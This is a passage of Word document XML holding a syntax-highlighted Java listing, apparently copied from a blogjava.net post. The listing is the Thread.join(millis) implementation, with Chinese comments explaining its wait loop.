          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>0.   </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="503" name="Codehighlighter1_565_1056_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/Expanded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highlighter1_565_1056_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId136"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>throws</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> InterruptedException {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12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="504" name="图片 92"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> base = System.currentTimeMillis();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13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="505" name="图片 93"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> now = 0;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14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="506" name="Codehighlighter1_646_730_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_646_730_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (millis &lt; 0) {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15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="507" name="图片 95"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>throw</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> IllegalArgumentException("timeout value is negative");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16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="508" name="图片 96" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEn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ttp://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140"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17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="509" name="Codehighlighter1_752_846_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_752_846_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (millis == 0) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>进入这个分支</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="510" name="Codehighlighter1_787_841_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_787_841_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (isAlive()) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>判断本线程是否为活动的。这里的本线程就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>t1.   </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="511" name="图片 99"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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wait(0);</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>阻塞</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="512" name="图片 100" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEn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http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140"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21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="513" name="Codehighlighter1_853_1048_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_853_1048_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> {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22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="514" name="Codehighlighter1_880_1043_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_880_1043_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (isAlive()) {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23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="515" name="图片 103"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> delay = millis - now;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24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="516" name="Codehighlighter1_939_966_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_939_966_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (delay &lt;= 0) {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25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="517" name="图片 105"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>break</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>;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26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="518" name="图片 106" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEn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www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140"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27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
